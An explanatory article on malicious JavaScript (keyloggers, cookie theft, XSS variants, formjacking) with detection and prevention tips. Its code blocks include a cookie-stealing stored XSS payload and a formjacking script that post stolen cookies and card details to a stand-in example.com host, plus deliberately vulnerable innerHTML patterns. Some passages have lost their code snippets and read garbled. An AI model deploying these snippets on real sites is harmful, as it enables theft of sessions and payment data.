The JavaScript language is widely used to develop various web applications. File handling using JavaScript plays a crucial role in enhancing the user experience. Still, attackers sometimes use malicious JavaScript code to utilize users' computer resources for illegal activities like stealing sensitive data, gaining illegal access to web applications, crypto-jacking, , and stealing cookies. cross-site scripting In some cases, detecting such codes can be challenging as the attackers use obfuscation techniques to hide and modify the codes. In this article, we explore various malicious JavaScript code and methods to guard against them. Examples of Malicious Code and Adequate Prevention Techniques Code that transfers user input data to a malicious external server: This JavaScript code is malicious as it passes sensitive user data like name, password, and email to an external malicious server that an attacker operates. Explanation: Here, the method is used to retrieve the value of form fields. The method assists in establishing a connection to the malicious example server and is used to set the request headers with header. Eventually, the method sends sensitive data to the malicious server. getElementById() open() setRequestHeader() Content-Type send() Detection: Prefer the following practices: Keep monitoring the network traffic actively to see if the script is making a request to connect the suspicious servers. Carefully monitor the code that sends data to servers using . AJAX requests Keep a record of third-party scripts to ensure they do not contain any malicious code to pass files illegally to unknown servers. Code that logs keystrokes: This JavaScript code is used to log every key that a user presses on their keyboard (as input) and sends it to an external server that the attackers operate. For instance, if the server at http://example.com/log-keystrokes.php is controlled by an attacker, it could be used to steal user credentials or other sensitive data. Explanation: It captures all keystrokes made by the user then creates a new object and sends the keystroke data to the malicious server at using the method . This is used to steal sensitive data such as login details, financial data, etc. by using users’ keystrokes. XMLHttpRequest ' ' http://example.com/log-keystrokes.php send() keylogger attack Detection: Look for code that listens for keyboard events, you can test it by entering the data. Keep monitoring the network traffic to see if the script is routing data to unknown servers. Make sure the third-party scripts do not contain malicious codes. Code that steals cookies: This code retrieves the user’s browser cookies and then passes them to an external malicious server (operated by an attacker). Here we have taken a sample site at which a malicious server is located and suppose it is controlled by an attacker. It could be used to retrieve a user’s session to gain unauthorized access. Explanation: http://example.com/steal-cookies.php Here is the method in which the code is used to retrieve the user's cookies. Then the code generates a new object and sends the cookie data to the malicious server at ' ' using the method. document.cookie XMLHttpRequest http://example.com/steal-cookies.php send() Detection: Look for the malicious code that retrieves or manipulates cookies stored by your web browser. Monitor the network traffic to see whether the script is sending cookies to unknown servers or not. These are typical instances of harmful JavaScript code that demonstrate how attackers exploit them to pilfer valuable user data. Given its extensive use on the web, we may unintentionally compromise our personal or sensitive information to theft. Additionally, evolving JS Sniffer techniques make us all vulnerable. Further, we'll delve into some unique tactics employed by attackers. Unique Tactics Employed by Attackers Cross-Site Scripting (XSS) attack: This attack happens when a malicious code is injected into a website or web app, and is executed by unaware visitors (using a cunning technique to conceal the code). Here are notable examples. Reflected XSS attack: <script> var query = window.location.search; var message = "Your search query: " + decodeURIComponent(query.substr(1)); document.getElementById("search-results").innerHTML = message; </script> In this example code, the attacker uses a “script” tag into the search query parameter of the URL which then comes back to the user in the server's response. Here, the script tag could contain malicious code that steals user data without the user’s consent or authorization. Stored XSS attack: <script> var xhr = new XMLHttpRequest(); xhr.open('POST', 'http://example.com/steal-data.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8'); xhr.send('cookie=' + encodeURIComponent(document.cookie)); </script> Here, an attacker injects a “script” tag that sends the user's cookies to an external malicious server operated by the attacker. This sort of malicious code is stored in the website's database and every time a user visits the site it gets executed automatically. DOM-based XSS attack: <script> var name = window.location.hash.slice(1); document.getElementById('welcome').innerHTML = 'Welcome, ' + name + '!'; </script> Here, the attacker injects a tag that reads the user's name from the and inserts it into the website's welcome or any sort of message. However, if the user's name contains malicious code, then it could be executed by the website in the browser. “script” URL hash Formjacking Attack: This attack occurs when an attacker injects malicious code into a website's checkout form which then steals the user's financial data (such as credit card information). Here's an example of a form jacking attack code: document.getElementById("checkout-form").addEventListener("submit", function(event) { var ccNumber = document.getElementById("credit-card-number").value; var ccCvv = document.getElementById("credit-card-cvv").value; var ccExp = document.getElementById("credit-card-exp").value; var xhr = new XMLHttpRequest(); xhr.open("POST", "http://example.com/steal-data.php", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("cc-number=" + encodeURIComponent(ccNumber) + "&cc-cvv=" + encodeURIComponent(ccCvv) + "&cc-exp=" + encodeURIComponent(ccExp)); event.preventDefault(); }); Here the code first listens for the submit event on the form and then captures the credit card details ( ) that the user entered into the checkout form fields. It then sends this information via an to a malicious remote server. such as number, CVV, and expiration date XMLHttpRequest Effective Tips for Guarding against Malicious Javascript Code There are some techniques that you can use to stop malicious JavaScript codes: Maintain software updates for your website, including platform, plugins, and components, to prevent known and new vulnerabilities. Monitor network traffic to detect JavaScript routes and alert on suspicious server activity if sensitive data is being sent. Use HTTPS instead of HTTP to ensure encrypted and secure data transmission between the website and users. As a user, leverage malicious code blocking web apps or extensions to prevent attacks. Employ input validation methods to prevent attackers from injecting malicious codes into the website. Adopt a content security policy (CSP) to prevent malicious script loading from external resources. Integrate a web application firewall (WAF) to protect against common attacks like SQL injection and cross-site scripting (XSS). Conclusion: JavaScript has transformed website and app interactions with its impressive capabilities. Its versatility enables developers to create high-quality applications that improve user experiences. However, great power requires great responsibility, and attackers have found ways to misuse JavaScript for malicious purposes. As their techniques continue to evolve, it is vital that web developers and users remain vigilant and implement appropriate security measures to safeguard against potential threats and malicious JavaScript.
